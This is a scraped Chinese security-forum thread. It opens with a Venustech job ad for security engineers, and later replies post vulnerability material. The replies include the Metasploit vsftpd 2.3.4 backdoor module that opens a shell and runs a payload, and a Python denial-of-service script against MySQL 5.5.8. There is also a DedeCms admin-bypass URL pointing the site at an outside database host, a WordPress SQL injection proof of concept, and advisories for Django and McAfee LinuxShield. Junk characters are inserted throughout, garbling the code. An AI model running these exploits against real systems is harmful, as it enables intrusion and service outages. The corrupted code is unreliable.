最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 启明星辰研发招聘

  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: xiaoyan@sitedirsec.com
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    站内发信给我就行了。
    6 p5 L7 h9 u5 i# b  i1 G; v  v* s9 `* }/ N' c7 g2 i) e: @

    一、研发中心:Linux C软件工程师(若干)

    岗位职责:

    1.
    1 h/ ?& X9 J5 |8 s$ l安全网关,防火墙,IPS等嵌入式设备软件开发,维护

    岗位要求:

    1.9 o' P2 F* q3 Y% G6 e9 L# C& V
    精通C语言编程

    2.
    $ v% N5 @. _2 z熟练使用Linux操作系统,精通 Linux下C语言编程

    3.$ X) Q2 f- e* l& H5 V6 b7 F
    精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

    4.
    : {2 a4 U9 K& r- q0 G9 z- D. P- ?熟悉网络安全协议及路由器、交换机、防火墙等安全设备

    5.+ P7 _2 t3 G* z% w
    熟悉Linux内核及开发

    二、研发中心:测试工程师(若干)

    岗位职责:

    1.
    * p3 e! }* Q% Q% C0 C负责产品的系统测试、集成测试工作

    2.
    2 i1 P6 J1 S) {! r! {负责产品用例的编写,执行、修改

    3., G) R" ~( T, k3 I" n
    负责产品性能的测试

    4.7 R2 }1 d5 t. B. ^1 w  w
    负责对外项目的支持和测试工作

    岗位要求:

    1.& i9 `3 t* `' ]" n5 j
    掌握基本的tcp/ip知识

    2.' N9 |6 n5 ^3 T2 S7 \7 @
    数通基础好

    3.
    ' T2 |9 P  x+ `' e  n! ~4 h" k1 \+ `对linux有一定的基础

    4.
    . K2 C$ F8 o: }, V掌握数据库的搭建和使用

    5.- Q" j7 }5 E6 t; t- J7 r' S* f
    至少熟悉一种编程语言C/Perl/VBS/TCL

    6.
    / t$ w* N% w# w: t熟悉测试用例设计,熟悉系统测试,熟悉压力测试

    7.( ~$ \* ?7 R6 M8 D) m& k$ s
    熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

    8.. V8 N  x8 ]& C8 O
    对网络安全设备在网络中的部署有一定的认识

    9., b3 q2 M2 F  E. H2 m- B8 T
    掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

    三、研发中心:安全事件工程师(若干)

    岗位职责:              

    1.
    . ^! z8 h3 C, d
    木&马检测服务、WEB漏洞扫描服务的实施

    2.
    7 A7 L6 ^8 l! X4 n& E
    对服务客户的技术支持

    3.
    ( M) }7 u% f  V5 i* }5 L! n  M
    对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

    4.
    / m: G2 j! \1 ]5 l) Q2 D# S  f
    对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

    5.
    7 K2 D- g: I% e9 }  u$ i
    对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究

     

    您可能还想看的主题:

    启明星辰招聘

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。
    收藏 分享

    VSFTPD v2.3.4 Backdoor 命令执行漏洞
    ################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################
    ; x# v+ |& O8 y5 d8 D! ?+ h
    & ~6 t5 c1 ^  x8 Y: }; K+ U" ]( x/ s; _

    ) L+ P+ n/ }" q4 x& M- Hrequire msf/core# o9 @9 E- S/ w% \! A
    - Z& R* c7 r6 B) D& t' c
    class Metasploit3 < Msf::Exploit::Remote
    , e% a1 \" P3 b5 LRank = ExcellentRanking
    # e2 v- r! [2 m% D5 H. A2 x( ~! d6 P: {0 w  I+ {
    include Msf::Exploit::Remote::Tcp& t3 ]/ U. p2 n: ?# z' N

    8 ?6 u1 k, z6 D, Jdef initialize(info = {})
    % k6 M/ k) e# S1 d' I) Q; O3 qsuper(update_info(info
    / N& B# B7 E! q# F) ^Name => VSFTPD v2.3.4 Backdoor Command Execution. x* n( i8 d8 z# h
    Descript_ion => %q{
    & Y  {1 I: {6 R2 FThis module exploits a malicious backdoor that was added to the VSFTPD download: W! S5 W4 m3 F2 Z! L
    archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between1 v, `/ H1 |5 Q3 V* t, W7 d9 R/ y
    June 30th 2011 and July 1st 2011 according to the most recent information
    % ^8 ?, g2 Q) o; `* V6 z3 navailable. This backdoor was removed on July 3rd 2011.; Y6 }' v3 q. R4 ^
    }
    0 T/ Y1 ?4 i7 N1 T' t+ r% dAuthor => [ hdm mc ]1 i+ _! [8 t2 H, R4 U/ J3 g4 q# e
    License => MSF_LICENSE" A4 a6 p2 g  ^  o. c
    Version => $Revision: 13099 $% n2 H# O, J) V  q
    References =>
    ' @) Q6 F& k9 g; ^  q& e6 C& ?% P[: a8 n9 K" Q+ Y; |3 V0 v
    [ URL http://pastebin.com/AetT9sS5]
    , j- U1 Y: i( M" A: a: {5 J[ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]
    4 z' ?9 B* H# J. G3 R]) H; o) b- T% G' V5 ^" n+ K. z- N5 h
    Privileged => true
    ( t/ s) t( T7 oPlatform => [ unix ]
    # h& u2 l  z6 y6 H, T; b% zArch => ARCH_CMD
    : z! Z0 D2 r& y" W" i$ KPayload =>) `4 i" X- i9 \$ \8 e
    {
    8 B# p) z1 \- K( _Space => 20007 \4 H. h& y' e0 r
    BadChars => 1 ?  M1 j  v* |$ E
    DisableNops => true7 n- v$ g! ]) P, N! L- z% E8 y9 C
    Compat =>
    0 _# N6 V6 w8 z6 i0 |) {5 K{/ |0 Q7 a& N$ ^
    PayloadType => cmd_interact
    7 t6 f, Y# n  yConnectionType => find! N  G1 z4 g) U; D
    }
    ! W$ q) {, t' Y6 f5 W}
    ) p" x6 @( ~1 z+ uTargets =>. K& f0 U- J+ n0 G
    [) I0 t+ p" t0 F- j2 D9 I
    [ Automatic { } ]8 i& C: l# K' o1 B" C5 u1 J
    ]! s. l$ ^- t( P3 D  j4 a% I
    DisclosureDate => Jul 3 2011) k. h& W7 _: Q) N
    DefaultTarget => 0))
    & j. Z$ R$ s! J4 y8 T  O  z7 z; l* A7 k% l
    register_options([ Opt::RPORT(21) ] self.class)" P7 y3 ~& C5 e" v, O
    end
    / M0 t4 b8 ^) Q( `' R( f! ]- |; a- m
    $ i1 r7 `' w' _8 I6 Ydef exploit
    % C- z, I/ x4 S; M6 l/ C
    3 f+ {+ O* N' V0 e- gnsock = self.connect(false {RPORT => 6200}) rescue nil5 A& p8 l+ U7 }3 s, i0 g
    if nsock
    . L/ s) b4 m4 T* dprint_status(The port used by the backdoor bind listener is already open)
    : d2 U" @! p/ ^handle_backdoor(nsock)
    8 i1 b# U: n1 n+ a5 D6 r- ireturn
    6 q+ O6 G! O* u* D' |1 b! Mend3 m1 i# [. o& h
    / P# V* j$ f5 N" N6 s
    # Connect to the FTP service port first
    2 t! o- E" r6 @, A1 V* Jconnect5 K( V9 L' t  `5 E2 M: q  u

    ; R; M7 P) c+ Ibanner = sock.get_once(-1 30).to_s. ?7 [# c- `, g: @2 R4 N
    print_status(Banner: #{banner.strip})
    : N" w' ]" C& e5 ^% ~$ x( q# y' a  [+ j, U& A0 c6 B  Y) m) G7 H
    sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)
    ; V& ?3 c& m" X* `1 [)
    9 k, l) j: e3 l3 M, m( Kresp = sock.get_once(-1 30).to_s
    # K* e! n$ ~6 V" mprint_status(USER: #{resp.strip})
    ! [2 d+ M9 s. i, r3 E8 h7 T' e( b9 ^: m8 a
    if resp =~ /^530 /
    6 Y1 K- o, V0 |7 `8 ]$ Jprint_error(This server is configured for anonymous only and the backdoor code cannot be reached)4 m- y- O8 E2 ?
    disconnect
    . K; U1 _- {. N2 ^return
    1 \! l/ Y2 L* f  h+ Mend. X' O8 ^2 _( c, ], U! B
    7 a) |' r& G4 H( P$ X. j8 I1 ^
    if resp !~ /^331 /- I' u. q; W  ?) L& g0 D
    print_error(This server did not respond as expected: #{resp.strip})
    5 K  n# {6 t" C  t$ v5 Rdisconnect2 t0 G; E8 v1 N1 F* T
    return
    % e; Q! X6 b9 n+ Z5 T' z# S0 iend6 e5 z# J! u+ h

    6 {; p) k; E/ u  e  ~, o& jsock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}2 S# M1 K" Q- Q: Z
    )
    / j& k1 [$ L9 j/ y5 P2 H" q0 y7 M% N$ l
    # Do not bother reading the response from password just try the backdoor
    # [' h6 [" m+ r* jnsock = self.connect(false {RPORT => 6200}) rescue nil
    / N8 n& m1 H- xif nsock
    8 Q; M% {7 E; [  C: y$ oprint_good(Backdoor service has been spawned handling...)
    ( W1 @! V2 a$ t/ |% \3 `handle_backdoor(nsock)
    3 k( `8 `0 P  T& O5 n2 D1 Sreturn
    - j2 _- K4 o6 T6 zend+ C+ }% x3 A' e4 m! c
    ' P0 M& N9 d7 \0 X2 ~2 p0 O% @
    disconnect
    ( }6 ~8 t' L  V$ K; Z  Z- \6 D
    2 \: `2 ]4 z" B, }- M$ A, Iend* l1 a0 E3 w. Q4 Z8 J% J  c* p
    ) {) S! z; }; u9 y
    def handle_backdoor(s)
    + a* g3 Y" A$ P5 y3 j4 @# u7 v* U6 F: A0 ]
    s.put(id
    ; o# S9 @" \3 B3 E9 [% S4 n0 u; \5 `)
    9 m  f' B: J* o
    * x$ c6 X% L6 s: J) x5 cr = s.get_once(-1 5).to_s$ {% j. k- B4 y7 ^: ]- c
    if r !~ /uid=/
    5 h: n4 P0 S. c1 V% Y! Qprint_error(The service on port 6200 does not appear to be a shell)
    ) J$ o( w: L: y, ]) u3 \  Odisconnect(s). i! }" [" Z: r% q+ ?  d
    return$ u/ J0 B& Q3 b5 M, M
    end
    " [1 @' F& w; Q( H0 c5 P( @
    3 N$ k$ m- J4 a8 j: }print_good(UID: #{r.strip})7 V8 H6 N/ n/ @% Z& [( W
    9 m: Y1 c! n% Y1 |4 b0 u: [. @
    s.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)# P$ ]% `) O  F1 ^9 R' E$ \
    handler(s)% Y0 |. R2 b% |, }
    end; d; s* {4 S, R. r( X- `
    1 o! g& f0 W% l
    end复制代码2 P2 A* X( `* y

    8 h) c8 D' a! P& |# r) j8 b( Q% h/ z1 J4 `# r, t0 V# N

    # E  Y' C; b: T0 e" Y; [" f% [6 `6 `: ^8 p& k) L+ ~# ]9 ]$ r
    & R5 O8 q8 s: D

    ' }0 x% F- u* \) h1 W8 n" E
    , o3 y* r' e, }# {# N6 h( ]0 C/ ^& D  s

    2 s. h4 M" I2 j# j0 _5 s0 q
    + J3 d( R+ H  B% Y. S5 [. N) e2 e* {& J! c& x. b6 T: ^
    & e3 f  A1 n( U* ^2 S4 Z
    ( E9 _, x+ o: r. H% m* D# ^/ y' j( z/ x

    " }- I2 V2 K: n4 x, d# S
    ' b# Z1 L. e/ \* B  U: D! Z( E8 e8 I( e# F* ^( o& r
    8 x" X. t; C; W# T) i

    2 U/ l! C1 M# r: B* A! e+ e: q- \公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
    1. Description:
    $ I8 V+ k- T/ s+ A) O7 I7 x  
    $ \# A% i6 N$ P6 k( W+ T     
    / G( i8 ]# y' `$ r  J* W2 n  
    . F2 c% ?# G/ f$ P, f) hSQL injection vulnerability in the Event List plugin 0.7.8 for WordPress" t6 _: E2 Q, x% I' Z# B+ Y% _
    allows an authenticated user to execute arbitrary SQL commands via the id+ ]3 e, B) [2 f0 u
    parameter to wp-admin/admin.php.
    : a6 u7 Y4 ^* U; F) m! m1 e  
    1 ]) @0 r- G  m   
    4 i; E  }7 K$ X  ; I1 r% }7 l" N/ L  [) R
    2. Proof of Concept:
    2 [! S) T1 b0 E( j( b! s  
    5 ?! G" e+ ~6 I# T  P+ l; I& j   # i! ]* J$ z- d8 I& L* m* |1 O! N
      
    # E3 f! j$ u: y) _+ \http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id! _" b4 t' a# z- c5 A. D$ \; F( q. Z7 j
    =1 AND SLEEP(10)) ?7 U: H1 G$ D3 ~$ l' }$ D

    9 n8 R- }, \9 j. R& ?/ y. R! @  
    6 K% ^1 ]4 A" f1 F; N   
    0 J8 R) ]) _% h  9 X* B: l5 m' A& @
    3. Solution:$ d) U" _# V% f* \! C5 N
      : T8 Q) L6 l; F+ m; X! l: c$ A
         ! @5 E( m% T. H. B  S+ g& [3 Q1 n
      
    1 [$ l( M8 W7 U( pThe plugin has been removed from WordPress. Deactivate the plug-in and wait: d7 S' S' Q. a% n, J" V
    for a hotfix." `7 L; h& P# ^+ h
      # A8 h- b+ E/ O& q# }* J* L
       - D1 n; l7 k  i& w# i2 I3 W& ]
      
    ) _' u  H% Z; X: B; [( J: I: ^# Z4. Reference:2 Q; k2 f2 L9 C# X; S) l' ]
      
    ( F' h. v( U- h, d/ C5 z   3 m0 l) |/ Q9 e2 I/ |
      
    - c# m6 D( j) }http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
    2 A. n' e; t3 _! tction-sqli/0 a7 S' m$ z9 e) I+ @, q# r  l$ l
      4 z( Q& X4 s( n' W7 Z
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
    % a/ H$ b) u% _- J  p. ]& j
    4 @/ F# ?/ P$ H5 y; I! }( J  U5 d, d6 r

    # z+ G& b* W4 A: w& f) b0 q! I* G) K% }2 j1 Z. K' x

    8 ~) g" R3 J/ B8 U" D2 `# R. T# j6 A! p# F% y: a
    , b* Y4 n2 p6 S4 i3 L
    5 X& S9 J& f+ g+ V6 }3 J0 p" U$ ]
    1 R1 r# ~' p( E8 ]

    4 ~" w, p2 o) H. l4 D. Z% N6 O: I
      q3 j. q' B# M, E6 s1 `

    + c2 l! q/ L5 x% s$ `; k  h8 s
    ( \! ~" v: s3 y3 r+ y5 ^3 H0 P* y  V+ [1 k# t; F) ^

    + R/ I2 F: s& B/ Z( D: S* L0 D4 h) k
    . c. M' h& D# S$ a7 L
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MySQL 5.5.8 远程拒绝服务漏洞
    import socket, sys" r* L* a  f% g, E  O

    ( r8 s8 H/ Q$ k( s  |$ j$ Zprint "; u% g1 U" v4 r1 j- S
    ": L% O( b. T2 f( d6 B
    print "----------------------------------------------------------------"( x/ z2 S8 W* D. D  Q9 U6 G5 K; N
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"" m& [2 `, m; J5 z! [+ g. X& g3 s
    print "| Level Smash the Stack                                         |"/ ]( _  `7 A: q6 W+ G' ?1 k
    print "----------------------------------------------------------------"$ C4 z/ F; k! J9 j7 x
    print "6 D) N# k' ?% b, A
    "  H- e2 e% F; q2 ]+ {. K5 m) D

    - |8 Q' H; w  ~/ ?2 Cbuf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"; ^3 y8 Z! d  B' e+ C. ]6 f
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")
    9 w3 F3 E+ t4 g! f/ t' @5 N5 P ) V: D5 C6 X4 d+ O- L7 N4 L4 {
    buf2=("x11x00x00x00x03set autocommit30"). }. E( w+ a5 J0 Q
    & L9 u. u3 n- [
    def usage():: m) y  w, s7 _9 h! S
    print "usage : ./mysql.py <victim_ip>"; ]( g/ ]# K- _* h2 k* q& k
    print "example: ./mysql.py 192.168.1.22"7 r2 K8 |( m" J- ~* D) q4 D
    1 Y, W' m* G3 [
    . C/ Q9 ]- L! p; e& x
    def main():
    * ~* x# u! `* l- O" y" eif len(sys.argv) != 2:0 D3 m5 K6 z% N0 ~5 c
    usage()
    . Q8 }  J4 V+ n5 |sys.exit()
    8 f& {4 e& d' x$ O- X  Z" ds = socket.socket(socket.AF_INET, socket.SOCK_STREAM)8 Q# `' y" w; v4 V
    0 R& @3 F0 l% W+ Q6 h
    HOST = sys.argv[1]* @4 V+ g; v+ p+ i4 e: K- N
    PORT = int(3306)
    # y; l3 O! ~8 ts.connect((HOST,PORT))
    6 n4 v, X; ?4 i4 D7 P; dprint "
  • Connect"
    5 h0 \" E; \7 D: ^  N2 Z! w2 \s.send(buf)7 ~& c  y, ]* Q6 I* v6 \8 g) {
    print "
  • Payload 1 sent"
    , v2 v9 T+ z0 V( ws.send(buf2)
    6 g8 h. Q# n" r4 b4 Vprint "
  • Payload 2 sent  s9 q" t6 C! R9 {9 G3 Z
    ", "
  • Run again to ensure it is down..
    ' U5 S+ }4 i7 A  I+ S"4 F- Z: z5 A# D( k+ c, ~& X6 d; U
    s.close()
    0 t' n. P: u+ Q7 q5 m- n
    ) \4 S% M8 C" {% M; t4 B/ M: xif __name__ == "__main__":
    * ?4 P8 {3 E8 [7 N9 t* [) H, S* Vmain()
    / c; ]# ?. s" a  F2 B
    5 K+ r! S1 C. e
    ( m; Y* ]" B. E) M
    * R8 N/ L" f2 d" |4 N3 H5 d$ M# K$ W5 \3 i) y
    + @3 _! C+ W( i8 Y
    2 {7 ^5 A1 z. V8 x8 b" y  y
    7 g5 _/ [" R" x5 D. A) `! w/ f
    . d: P; q9 S0 a, U3 w4 o5 l; G

    % J% ?. {: H- P6 n  _3 ?
    ' L" f; A/ }, I: t8 Y' `! @2 E
    2 V1 A' Z3 Z- R! X# ?
    + m0 B  ^( ?8 L8 t( P% d% C, t* @+ g
    9 |$ T8 k/ ]. m- Q4 p* P. M( t5 p
    ) {  x% r0 S4 ?5 V0 T# T7 |4 G
    7 U0 w0 ?% l0 I* H: J1 v0 i

    ! I5 |& j# H: f8 z6 K* ]. T- F+ f" M8 }
    & x7 R  ?" w, P: a公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    手把手教你装Linux系统-设置虚拟机
    2 r1 T  g. B, B  b8 Y
    http://www.sitedir.com.cn/video/4.swf
    3 y2 }0 B  {% k% m: o  v3 b: Z9 G
    & J3 W0 y- I. c# W. z  u! F4 }! D1 ?$ X, y& q
      l( v% |  x& A4 E7 {

    0 N1 a6 d5 i' i7 e0 h. E2 Z8 p+ g1 S0 z9 O/ s! {7 j- F
    2 g% h9 n) a* w4 E. f
    9 O6 [% Z/ B9 L0 V, d% r9 M
    $ l* i% S: e& A1 H+ K$ a4 j$ M" ]

    5 x$ K* X& _5 N4 M, |. `. o3 y4 D* B0 V9 Z9 |

    , l9 q$ ?  L% g9 x
      ?. G: }, J! e# c
    , ]6 a8 A  u0 C- a) l, I# R! j! \: ~2 x: [
    " E( F3 H' e' y; t# C
    8 A# e$ Y* i, a- O9 ^- |- X  j  u$ `1 q8 q' j1 G! s7 S

      e. I+ N% t$ V- u( B6 ?  \0 |
    0 l6 D; z; |0 O! R4 h. P# J1 D: F公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root

    - ^2 F- f8 [: n( Z
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台
    ' D- e8 @  _* S) \2 m/ C* a
    此漏洞的前提是必须得到后台路径才能实现

    + e* z8 c$ B" e. v$ _
    官方临时解决办法:
    + N% h1 v& f) i% ]+ @
    找到include/common.inc.php文件,把:

    2 y4 ~& \. M! W
        foreach($_REQUEST as $_k=>$_v)' i9 a# T8 A) r
        {
    / ?' J4 s' z" @! L' B$ w        var_dump($_k);0 H* z, C( m2 \! Q3 a
            if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )2 Z" o) H8 ~0 W% x
            {
    - c* c( R& b* _6 |            exit('Request var not allow!');! }* X! A" z2 @1 N/ A% G3 b
            }
    5 F2 _. R. M1 p8 n$ b" T  a5 `. b% Y    }

    8 a; B$ P& f5 o8 y  H& [
    换成:
    % R+ s' N8 _. k" a; i; k
        //检查和注册外部提交的变量
    ' r7 {! ?6 l  m1 c* J1 n    function CheckRequest(&amp;$val) {
    ' N2 Y, C4 }2 L5 r# x' u        if (is_array($val)) {
    7 A, c! M" o4 g; n6 I            foreach ($val as $_k=>$_v) {4 J$ k3 P% g9 i6 [6 Y: Q
                    CheckRequest($_k);+ G3 F: v6 I, ^
                    CheckRequest($val[$_k]);6 n0 V: h1 U( s1 R+ }
                }. Q7 \/ j0 E9 D2 P9 k
            } else" R- E: h. b& a. k: a! ?
            {
    8 _7 n8 B; D8 b) T0 h' {; [            if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )+ _0 t8 g; |2 o; k" G# I8 [
                {3 W* h- z- U- c8 c7 |& [' I
                    exit('Request var not allow!');
    , E2 r9 a5 A7 r, d            }
    # r1 P5 L- K1 Y7 H8 S' D! z# k        }
    # E* a: T$ U# w  D    }
    , T& Z: z" ~! o* \, x2 D    CheckRequest($_REQUEST);0 j; J  C7 R8 z" X5 ^2 J( A
    0 X: u  X5 \! `7 i6 O* L

    & X/ Y5 ?- l$ i! w
    + i; }7 j, v3 d8 \4 O
    + y0 W/ F8 P. X8 Y* V* e) K0 Y
    ; v' ^4 d7 H5 h3 y( e1 i; K$ }& \0 V1 x" I/ ~* t6 P9 F

    - {; @1 P% @0 B9 A, Z! s' c$ t2 Z& i9 u  q2 z) M
    . T7 j# M2 g! z" U8 o; m

    $ @- ?- E+ N5 M6 v9 g- h! R, D
    ' f" J1 ?: O/ u6 r- @3 w  o9 S4 l! z- f+ P! l+ S$ W* Q

    . a5 ]7 A! g4 K5 {2 R. c/ W- ~8 `3 _; d- M( g2 V& ^& v/ d6 W
    0 Z+ v0 C, O% _
    + T& Z$ q+ D* f& Y1 v  t

    9 B  t$ V  X4 h- Y! w5 d0 m& h* X. Z$ g1 U

    / U8 f8 t! m* b; {9 Y! g' C$ D8 \  Y公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>
    5 D6 A0 t! U, u& k9 b/ h- [/ @3 Y  e( L" d& i- i4 Y. D4 x
    http://www.sitedir.com.cn/video/8.swf[/quote]
    1 H# a( d. m3 k7 [8 k0 E$ V  [
    ( G1 c" F1 l7 v
    6 b6 J7 a1 p! |8 u, M; h7 L5 }2 x6 e  n( m: C& X; V& L2 d6 j

    , L# a/ U5 V8 Z
    ' Z$ B5 G. Q5 T, V0 `5 |& J# i: F2 K5 [0 C" T! E4 n6 I6 z

    " M4 U! }7 D8 A% @0 Y4 @
    $ F; W8 p+ a% A
    6 v3 w$ n4 M3 m# c  [' l& Z$ A: f  W3 Y
    & v/ U. N) J8 m) {) }5 c4 Q

    ( @) o1 G, _5 o
    3 b' o, F% r4 W* o5 b/ L5 `5 H5 n) M- e9 R' X! C6 A  O, T0 S
    2 _0 X7 z* q! a  m0 @/ y, D+ i% M6 O
    . @, a) r* W5 n8 x3 b

    ! A0 b$ c% q" Z8 h1 w
    " P# b8 b. [% N9 U2 w* C公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12

    2 G2 N8 |% e/ G5 {& @8 {5 m
    影响版本:, Y) y0 F! z( a/ J
    Django 1.2.5
    ' z6 q# r4 Z- w1 O) c) zDjango 1.3 beta 1
    ; j8 a- E$ y3 [  K: T: O1 m% y8 qDjango 1.2.4
      U1 I1 A& x* w$ _! TDjango 1.2.2
    , @# P3 [1 k, O# W- x8 mDjango 1.2
    ; C) ~% @# S/ A, u" k2 d
    漏洞描述:

    9 l- c2 O! p6 J! e/ @4 U8 W
    Django是一款开放源代码的Web应用框架,由Python写成。
    & e- X% ^* v, {3 f! oDjango存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。3 V3 I! a/ s( r  L9 \
    1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。6 @+ {' p/ I; H, q
    2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。4 [* W1 e6 v" Z: v" Y
    3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。
    ( F1 }1 Z. r5 k) B8 A4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。
    ! d$ {+ `6 B; y$ T2 U8 P
    细节参考:
    % {5 J' D0 X+ f4 zhttps://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/, \6 E0 z7 D' l' g" _
    http://secunia.com/advisories/45939/
    $ N; x; R8 v! n5 d/ T
    # w9 l# ?1 s( d0 E1 `, I& r5 Z6 n
    + e, F5 `0 _7 r. J

    # J% D9 w4 V! R* R/ r! C
    / M+ u7 U. K' K4 x- a
    7 o* i( A- U( k8 N4 H3 ?; g$ T7 c4 x# l% D
    ' }7 |7 ~$ i* i1 h5 f

    4 @# s+ K& V0 o8 E0 ~  e: T0 W3 [
    7 N7 C# G) T' w0 k. o. M1 ?* O  l( |# v% W: _

    ! a) B' E! |0 C
    8 s. b$ @0 k  N3 s6 ?* y
    ; m. X& K( p' E' z; |' ?/ C2 N
    # _4 j$ F7 H$ q( A; Y2 I
    2 T' V& I2 T8 I6 l& e6 K7 k( C. j! y, P5 M. U/ U3 f- Q
    3 u! I. Z& q) o
      q/ p( c* K' |# N0 a: X

    : f, p1 M& j2 d0 k" p1 G公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code
    ' H( I+ [; k# {7 ^' _影响版本: McAfee LinuxShield <= 1.5.1
    : E  p' C0 ]7 W- v" h2 p& Y! S: N% \9 m远程攻击: Yes 0 P# B- U8 t# {: f8 K
    本地溢出: Yes
    " _8 U- L+ s6 H. O背景阅读:
    % s* u' ]) f! |===========5 ]; v  u; q0 E& K, g" Y1 y/ X

    0 Y6 L7 `7 a: o, W: |0 oLinuxShield detects and removes viruses and other potentially unwanted& l7 P5 P$ |0 Q+ l2 X
    software on Linux-based systems. LinuxShield uses the powerful McAfee0 y" p, Q7 t' q6 A+ ?( n1 J
    scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our, w9 I3 \6 B+ q8 L# @8 ?% }
    anti-virus products.* W! F# T* \1 T- M) N

    & P. [# A& S; R; {Although a few years ago, the Linux operating system was considered a6 q% X( F# F# |: b% J' W
    secure environment, it is now seeing more occurrences of software
    - L" R0 R+ G8 x4 r1 vspecifically written to attack or exploit security weaknesses in
    * L( T% M/ J% y1 D. r1 _Linux-based systems. Increasingly, Linux-based systems interact with
    1 n7 K" w; }* R8 @! q- V: D2 ZWindows-based computers. Although viruses written to attack Windows-
    % r" N$ M7 l/ l- R- H. ibased systems do not directly attack Linux systems, a Linux server
    " ~0 a* Y7 H1 l3 ocan harbor these viruses, ready to infect any client that connects to
    % O/ y, W2 }. sit.8 Z( t1 D# N& J' u6 C) K

    , J4 v9 I; E/ K" p3 \When installed on your Linux systems, LinuxShield provides protection8 O" k4 s5 l- ]6 H* ?( }
    against viruses, Trojan horses, and other types of potentially) }, V6 k+ E2 j$ L
    unwanted software.  Q, a& J4 D7 f! C
    ( A/ ]. u: B; c: L% L; i9 Z
    LinuxShield scans files as they are opened and closed
    " t! _+ ?$ Q5 h* V?&amp;#65533;&amp;#65533; a technique6 x, I3 K. a: \: o: M1 [
    known as on-access scanning. LinuxShield also incorporates an
      [2 }7 o1 q' q; p8 L% j7 zon-demand scanner that enables you to scan any directory or file in
    + W, O# O# l4 O0 U) _. Dyour host at any time.  K1 D" B7 m3 N3 l! |0 m

    2 r/ r: p1 j4 lWhen kept up-to-date with the latest virus-definition (DAT) files,% [5 r/ f1 y: K. Q; c7 M, P& P
    LinuxShield is an important part of your network security. We
    # X; t3 r2 z' @! h- p5 Krecommend that you set up an anti-virus security policy for your+ Q& {) L; a. ~, \9 d0 I- ]7 ^
    network, incorporating as many protective measures as possible.: A* {* r2 J, {1 _
    5 T0 B$ g2 Q; U8 p4 c
